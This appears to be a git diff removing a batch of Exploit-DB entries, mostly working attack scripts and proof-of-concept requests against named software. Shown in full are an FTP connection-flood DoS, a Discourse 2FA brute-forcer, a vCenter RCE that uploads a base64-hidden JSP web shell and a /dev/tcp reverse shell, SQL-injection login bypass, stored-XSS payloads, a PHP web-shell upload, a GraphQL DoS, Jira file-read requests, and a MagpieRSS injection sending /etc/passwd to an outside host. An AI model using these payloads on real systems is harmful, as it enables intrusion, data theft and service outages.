|By XYN/DUMP/NSKB3|
|_|_____________|_|
|_|_|_|_____|_|_|_|
|_|_|_|_|_|_|_|_|_|
"""
usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
def test(t,p):
s = socket.socket()
s.settimeout(10)
try:
s.connect((t, p))
response = s.recv(65535)
s.close()
return 0
except socket.error:
print("Port {} is not open, please specify a port that is open.".format(p))
sys.exit()
def attack(targ, po, id):
try:
subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#print("Worker {} running".format(id))
except OSError: pass
def main():
global target, port, start
print banner
try:
target = sys.argv[1]
except:
print usage
sys.exit()
try:
port = int(sys.argv[2])
except:
port = 21
try:
conns = int(sys.argv[3])
except:
conns = 50
print("[!] Testing if {0}:{1} is open".format(target, port))
test(target, port)
print("[+] Port {} open, starting attack...".format(port))
time.sleep(2)
print("[+] Attack started on {0}:{1}!".format(target, port))
def loop(target, port, conns):
global start
threading.Thread(target=timer).start()
while 1:
for i in range(1, conns + 3):
t = threading.Thread(target=attack, args=(target,port,i,))
t.start()
if i > conns + 2:
t.join()
break
loop()
t = threading.Thread(target=loop, args=(target, port, conns,))
t.start()
def timer():
start = time.time()
while 1:
if start < time.time() + float(900): pass
else:
subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
t = threading.Thread(target=loop, args=(target, port,))
t.start()
break
main()

70
exploits/multiple/webapps/49780.py
View file

@ -1,70 +0,0 @@
# Exploit Title: Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass
# Date: 14/01/2021
# Exploit Author: Mesh3l_911
# Vendor Homepage: https://www.discourse.org/
# Software Link:https://github.com/discourse/discourse
# Version: Discourse 2.7.0
# CVE: CVE-2021-3138
import requests
username = input("\n input ur username : ")
password = input("\n input ur password : ")
session=requests.session()
proxies = []
def proxies():
proxies_path = input("\n input ur proxies path : ")
with open(proxies_path, 'r') as prox:
for _ in prox.read().splitlines():
proxies.append()
backup_codes = []
def backup_list():
Backup_codes = input("\n input ur Backup_codes list path : ")
with open(Backup_codes, 'r') as codes:
for _ in codes.read().splitlines():
backup_codes.append()
def exploit():
with open('Backup_codes.txt', 'w') as results:
try:
for __ in proxies:
for _ in codes.read().splitlines():
header =\
{
"X-CSRF-Token": "ur X-CSRF-Token",
"Cookie": "ur Cookie",
"X-Requested-With": "XMLHttpRequest"
}
body = {"login": username, "password": password, "second_factor_token": _, "second_factor_method": "2"}
request = session.post("ur target_url", headers=header, data=body, proxies={'http': __, 'https':__})
source = request.text
backup_codes.remove(_)
if request.status_code == 200:
if '"id"' in source:
results.write("The Backup_Coude is > {} ".format(_))
return True
else:
pass
else:
proxies.remove(__)
break
except requests.exceptions.SSLError and requests.exceptions.ConnectionError:
print(" Connection Failed :( ")
results.close()
def main():
if exploit():
print("\n Found :) \n")
else:
print("\n Please re-check ur inputs :( \n")
if __name__ == '__main__':
main()

117
exploits/multiple/webapps/50056.py
View file

@ -1,117 +0,0 @@
# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 06/21/2021
# Exploit Author: CHackA0101
# Vendor Homepage: https://kb.vmware.com/s/article/82374
# Software Link: https://www.vmware.com/products/vcenter-server.html
# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux)
# CVE: 2021-21972
# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md
#!/usr/bin/python2
import os
import urllib3
import argparse
import sys
import requests
import base64
import tarfile
import threading
import time
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
myargs=argparse.ArgumentParser()
myargs.add_argument('-T','--target',help='The IP address of the target',required=True)
myargs.add_argument('-L','--local',help='Your local IP',required=True)
args=myargs.parse_args()
def getprompt(x):
print ("(CHackA0101-GNU/Linux)$ "+ str(x))
def getpath(path="/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp"):
fullpath="../" * 7 + path
return fullpath.replace('\\','/').replace('//','/')
def createbackdoor(localip):
# shell4.jsp
backdoor = "PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg=="
backdoor = base64.b64decode(backdoor).decode('utf-8')
f = open("shell4.jsp","w")
f.write(backdoor)
f.close()
# reverse.sh
# After decoding overwrite string 'CUSTOM_IP' for local IP
shell="IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE="
shell=base64.b64decode(shell).decode('utf-8')
shell=shell.replace('CUSTOM_IP',localip)
f=open("reverse.sh","w")
f.write(shell)
f.close()
# Move on with the payload
payload_file=tarfile.open('payload.tar','w')
myroute=getpath()
getprompt('Adding web backdoor to archive')
payload_file.add("shell4.jsp", myroute)
myroute=getpath("tmp/reverse.sh")
getprompt('Adding bash backdoor to archive')
payload_file.add("reverse.sh", myroute)
payload_file.close()
# cleaning up a little bit
os.unlink("reverse.sh")
os.unlink("shell4.jsp")
getprompt('Backdoor file just was created.')
def launchexploit(ip):
res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60)
if res.status_code == 200 and res.text == 'SUCCESS':
getprompt('Backdoor was uploaded successfully!')
return True
else:
getprompt('Backdoor failed to be uploaded. Target denied access.')
return False
def testshell(ip):
getprompt('Looking for shell...')
shell_path="/ui/resources/shell4.jsp?cmd=uname+-a"
res=requests.get('https://' + ip + shell_path, verify=False, timeout=60)
if res.status_code==200:
getprompt('Shell was found!.')
response=res.text
if True:
getprompt('Shell is responsive.')
try:
response=re.findall("b>(.+)</",response)[0]
print('$>uname -a')
print(response)
except:
pass
return True
else:
getprompt('Sorry. Shell was not found.')
return False
def opendoor(url):
time.sleep(3)
getprompt('Executing command.')
requests.get(url, verify=False, timeout=1800)
def executebackdoor(ip, localip):
url="https://"+ip+"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh"
t=threading.Thread(target=opendoor,args=(url,))
t.start()
getprompt('Setting up socket '+localip+':443')
os.system('nc -lnvp 443')
if len(sys.argv)== 1:
myargs.print_help(sys.stderr)
sys.exit(1)
createbackdoor(args.local)
uploaded=launchexploit(args.target)
if uploaded:
tested=testshell(args.target)
if tested:
executebackdoor(args.target, args.local)
getprompt("Execution completed!")

39
exploits/multiple/webapps/50079.txt
View file

@ -1,39 +0,0 @@
# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
# Date: 2021-06-18
# Exploit Author: Stig Magnus Baugstø
# Vendor Homepage: https://scratch.mit.edu/
# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
# Version: 3.10.2
# Tested on: Windows 10 x64, but should be platform independent.
# CVE: CVE-2020-7750
Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008
CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/
You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="<INSERT JS PAYLOAD>" />
</svg>
The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.
Example of regular cross-site scripting (XSS):
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="alert('Pwned!')" />
</svg>
The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image href="doesNotExist.png" onerror="require('electron').shell.openExternal('cmd.exe')" />
</svg>
The example above launches cmd.exe (Command Prompt) on Windows.
For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/
Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.

18
exploits/multiple/webapps/50359.txt
View file

@ -1,18 +0,0 @@
# Exploit Title: PlaceOS 1.2109.1 - Open Redirection
# Date: 29-09-2021
# Exploit Author: Hamza Khedr @ Accenture Austalia AARO Team
# Vendor Homepage: https://place.technology/
# Software Link: https://github.com/PlaceOS
# Version: < 1.29.10
# Tested on: Ubuntu 20.04
# CVE: CVE-2021-41826
#
#
# PoC: "https://office.example.com/auth/logout?continue=//attacker.com"
# "https://office.example.com/auth/logout?continue=.attacker.com"
# "https://office.example.com/auth/logout?continue=:password@attacker.com"
#
#
# Reference: https://github.com/PlaceOS/auth/issues/36
# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41826
# https://nvd.nist.gov/vuln/detail/CVE-2021-41826

87
exploits/multiple/webapps/50380.txt
View file

@ -1,87 +0,0 @@
# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read
# Date: 2021-10-05
# Exploit Author: Mayank Deshmukh
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: Kali Linux & Windows 10
# CVE : CVE-2021-26086
POC File #1 - web.xml
GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #2 - seraph-config.xml
GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #3 - decorators.xml
GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #4 - /jira-webapp-dist/pom.properties
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #5 - /jira-webapp-dist/pom.xml
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #6 - /atlassian-jira-webapp/pom.xml
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
POC File #7 - /atlassian-jira-webapp/pom.properties
GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

55
exploits/php/dos/49807.py
View file

@ -1,55 +0,0 @@
# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service
# Author: Dolev Farhi
# Date: 2021-04-12
# Vendor Homepage: https://www.wpgraphql.com/
# Version: 1.3.5
# Tested on: Ubuntu
"""
This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
"""
import sys
import requests
def usage():
print('* WordPress GraphQL 1.3.5 Denial of Service *')
print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))
print('python {} http://site.com 10000 100'.format(sys.argv[0]))
sys.exit(1)
if len(sys.argv) < 4:
print('Missing arguments!')
usage()
def wpgql_exists():
try:
r = requests.post(WORDPRESS_URL, json='x')
if 'GraphQL' in r.json()['errors'][0]['message']:
return True
except:
pass
return False
# This PoC assumes graphql is located at index.php?graphql
WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
FORCE_MULTIPLIER = int(sys.argv[2])
CHAINED_REQUESTS = int(sys.argv[3])
if wpgql_exists is False:
print('Could not identify GraphQL running at "/index.php?graphql"')
sys.exit(1)
queries = []
payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}
for _ in range(0, CHAINED_REQUESTS):
queries.append(query)
r = requests.post(WORDPRESS_URL, json=queries)
print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
print('Response:', r.json())

12
exploits/php/webapps/49381.txt
View file

@ -1,12 +0,0 @@
# Exploit Title: Resumes Management and Job Application Website 1.0 - Multiple Stored XSS
# Date: 2/1/2021
# Exploit Author: Saswat Subhajyoti Mallick
# Vendor Homepage: https://egavilanmedia.com/
# Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/
# Version: 1.0
# Tested on: windows 10/wamp
Attacker can put stored xss and gain admin access unauthenticated .
For stored XSS poc simply put <script>alert(1)</script> in first name,last name and address field while applying for resume.
Stored XSS will be activated the moment admin user logs in.

58
exploits/php/webapps/49462.py
View file

@ -1,58 +0,0 @@
# Exploit Title: Library System 1.0 - Authentication Bypass Via SQL Injection
# Exploit Author: Himanshu Shukla
# Date: 2021-01-21
# Vendor Homepage: https://www.sourcecodester.com/php/12275/library-system-using-php.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/libsystem.zip
# Version: 1.0
# Tested On: Windows 10 + XAMPP 7.4.4
# Description: Library System 1.0 - Authentication Bypass Via SQL Injection
#STEP 1 : Run The Exploit With This Command : python3 exploit.py
#STEP 2 : Input the URL of Vulnable Application. For Example: http://10.9.67.23/libsystem/
#STEP 3 : Open the Link Provided At The End After Successful authentication bypass in Browser.
#Note - You Will Only Be Able To Access The Student Area as a Privileged User.
import requests
YELLOW = '\033[33m' # Yellow Text
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
print(YELLOW+' _ ______ _ _ ___ ', RESET)
print(YELLOW+' ___| |_ ___ / / ___|| |__ __ _ __| |/ _ \__ __', RESET)
print(YELLOW+" / _ \ __/ __| / /|___ \| '_ \ / _` |/ _` | | | \ \ /\ / /", RESET)
print(YELLOW+'| __/ || (__ / / ___) | | | | (_| | (_| | |_| |\ V V / ', RESET)
print(YELLOW+' \___|\__\___/_/ |____/|_| |_|\__,_|\__,_|\___/ \_/\_/ ', RESET)
print(YELLOW+" ", RESET)
print('********************************************************')
print('** LIBRARY SYSTEM 1.0 **')
print('** AUTHENTICATION BYPASS USING SQL INJECTION **')
print('********************************************************')
print('Author - Himanshu Shukla')
#Create a new session
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'c9ead80b7e767a1157b97d2ed1fa25b3'}
LINK=input("Enter URL of The Vulnarable Application : ")
#Authentication Bypass
print("[*]Attempting Authentication Bypass...")
values = {"student":"'or 1 or'","login":""}
r=s.post(LINK+'login.php', data=values, cookies=cookies)
r=s.post(LINK+'login.php', data=values, cookies=cookies)
#Check if Authentication was bypassed or not.
logged_in = True if not("Student not found" in r.text) else False
l=logged_in
if l:
print(GREEN+"[+]Authentication Bypass Successful!", RESET)
print(YELLOW+"[+]Open This Link To Continue As Privileged User : "+LINK+"index.php", RESET)
else:
print(RED+"[-]Failed To Authenticate!", RESET)

29
exploits/php/webapps/49467.txt
View file

@ -1,29 +0,0 @@
# Exploit Title: MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF
# Date: 1/21/2021
# Author: 0xB9
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1428
# Version: 1.0
# Tested on: Windows 10
1. Description:
MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles & a CSRF that allows for the users timeline banner/image to be changed.
2. Proof of Concept:
~ XSS via Thread/Post ~
- Make a new thread or reply to an existing thread
- Input a payload in either the thread title or main post itself <script>alert('XSS')</script>
Payload will execute when visiting your profile.
~ XSS via Location/Bio ~
- Go to User CP -> Edit Profile
- Input a payload in the Location/Bio <script>alert('XSS')</script>
Payload will execute when visiting your profile.
~ CSRF ~
<form class="coverpicForm" action="http://localhost/mybb/timeline.php?action=profile&uid=1" style="display: block;">
<input type="text" name="coverpic" placeholder="Add Image URL" required="">
<input type="hidden" name="do_coverpic" value="change">
<input type="submit" value="Change">
</form>

19
exploits/php/webapps/49574.txt
View file

@ -1,19 +0,0 @@
# Exploit Title: PEEL Shopping 9.3.0 - 'Comments/Special Instructions' Stored Cross-Site Scripting
# Date: 2021-02-16
# Exploit Author: Anmol K Sachan
# Vendor Homepage: https://www.peel.fr/
# Software Link: https://sourceforge.net/projects/peel-shopping/
# Software: PEEL SHOPPING 9.3.0
# Vulnerability Type: Stored Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10 XAMPP
# This application is vulnerable to Stored XSS vulnerability.
# Vulnerable script: http://localhost/peel-shopping_9_3_0/achat/achat_maintenant.php
# Vulnerable parameters: 'Comments / Special Instructions :'
# Payload used:
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
# POC: in the same page where we injected payload refresh the page.
# You will see your Javascript code (XSS) executed.

42
exploits/php/webapps/49605.txt
View file

@ -1,42 +0,0 @@
# Exploit Title: Web Based Quiz System 1.0 - 'MCQ options' Persistent/Stored Cross-Site Scripting
# Date: 2021-03-02
# Exploit Author: Praharsh Kumar Singh
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link: https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software: Web Based Quiz System
# Version: 1.0
# Vulnerability Type: Cross-site Scripting
# Vulnerability: Persistent/Stored XSS
# Tested on: Parrot OS
# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in adding questions in options parameter affected from this vulnerability.
# payload: </script><script >alert(document.cookie)</script>
POST /onlinequiz_0/update.php?q=addqns&n=1&eid=603d2f766b0d0&ch=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 101
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://localhost/onlinequiz_0/dashboard.php?q=4&step=2&eid=603d2f766b0d0&n=1
Cookie: PHPSESSID=icctgctoho6nlqc6cbp8bftkeh
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
qns1=1&11=1&12=1&13=%3C%2Fscript%3E%3Cscript+%3Ealert%28document.cookie%29%3C%2Fscript%3E&14=1&ans1=c
POC:
# go to url http://localhost:8080/admin.php
# login and add question
# then put the above payload in MCQ options parameter
# then fill the remaining details
# then click add
# go to url http://localhost:8080/login.php
# then login to user account
# then attempt the quiz while attempting the quiz xss pop up there..!

60
exploits/php/webapps/49607.txt
View file

@ -1,60 +0,0 @@
# Exploit Title: Web Based Quiz System 1.0 - 'name' Persistent/Stored Cross-Site Scripting
# Date: 2021-03-02
# Exploit Author: P.Naveen Kumar
# Vendor Homepage: https://www.sourcecodester.com
# Software Download Link : https://www.sourcecodester.com/php/14727/web-based-quiz-system-phpmysqli-full-source-code.html
# Software : Web Based Quiz System
# Version : 1.0
# Vulnerability Type : Cross-site Scripting
# Vulnerability : Persistent/Stored XSS
# Tested on: Windows 10 Pro
# Stored/persistent XSS has been discovered in the Web Based Quiz System created by sourcecodester/janobe
# in registration form in name parameter affected from this vulnerability.
# payload: <script>alert(document.cookie)</script>
# HTTP POST request
POST http://localhost:8080/quiz/register.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------283640616528311462411171270636
Content-Length: 690
Origin: http://localhost:8080
Connection: keep-alive
Referer: http://localhost:8080/quiz/register.php
Cookie: PHPSESSID=ptujqhbkupjsqjkqs7tjhnb5er
Upgrade-Insecure-Requests: 1
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="name"
<script>alert(document.cookie)</script>
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="email"
test123@gmail.com
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="password"
Hacker
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="college"
hello
-----------------------------283640616528311462411171270636
Content-Disposition: form-data; name="submit"
-----------------------------283640616528311462411171270636--
POC:
# go to url http://localhost:8080/quiz/register.php
# then you have to fill the above payload in name/username parameter
# then fill the remaining details
# then click submit
# then login to user account
# then attempt any one quiz after attempting go to ranking section then
# you can see xss pop up there..!

79
exploits/php/webapps/49615.txt
View file

@ -1,79 +0,0 @@
# Exploit Title: Online Ordering System 1.0 - Arbitrary File Upload to Remote Code Execution
# Date: 04/03/2021
# Exploit Author: Suraj Bhosale
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/5125/online-ordering-system-using-phpmysql.html
# Version: 1.0
# Tested on Windows 10, XAMPP
Request:
========
POST /onlineordering/GPST/store/initiateorder.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0)
Gecko/20100101 Firefox/85.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;
boundary=---------------------------14955282031852449676680360880
Content-Length: 972
Origin: http://localhost
Connection: close
Referer: http://localhost/onlineordering/GPST/store/index.php
Cookie: PHPSESSID=0es23o87toitba1p1pdmq5i6ir
Upgrade-Insecure-Requests: 1
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="transnum"
VAF-XAP
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="select1"
25
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="pname"
keychain
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="select2"
1
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="txtDisplay"
25
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="note"
test
-----------------------------14955282031852449676680360880
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream
<?php echo "Shell";system($_GET['cmd']); ?>
-----------------------------14955282031852449676680360880--
Response:
=========
HTTP/1.1 200 OK
Date: Thu, 04 Mar 2021 13:28:27 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
X-Powered-By: PHP/7.3.27
Content-Length: 55
Connection: close
Content-Type: text/html; charset=UTF-8
<meta http-equiv="refresh" content="1; url=index.php">
# Uploaded Malicious File can be Found in :
onlineordering\GPST\store\design
# go to
http://localhost/onlineordering/GPST/store/design/shell.php?cmd=hostname
which will execute hostname command.

22
exploits/php/webapps/49643.txt
View file

@ -1,22 +0,0 @@
# Exploit Title: MagpieRSS 0.72 - 'url' Command Injection and Server Side Request Forgery
# Date: 24 March 2021
# Exploit Author: bl4ckh4ck5
# Vendor Homepage: http://magpierss.sourceforge.net/
# Software Link: https://sourceforge.net/projects/magpierss/files/magpierss/magpierss-0.72/magpierss-0.72.tar.gz/download
# Version: MagpieRSS 0.72 and maybe older once aswell.
# Tested on: Linux debian buster with default apache install.
In MagpieRSS 0.72 on the /scripts/magpie_debug.php?url=testtest and /scripts/magpie_simple.php page i noticed there was a command injection in the RSS URL field when you send a https url and click the Parse RSS button.
if you would send "https://www.example.com? -o /var/www/html/testtest.php" as input it would save the url output to the testtest.php file directly in the /var/www/html/ folder.
the "?" is importent or it won't work.
it is also possible to read any file if you send it like this "https://zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net? --data '@/etc/passwd'" then the page "zcf0arfay3qgko9i7xr0b2vnxe39ry.burpcollaborator.net" would receive as POST data the /etc/passwd file.
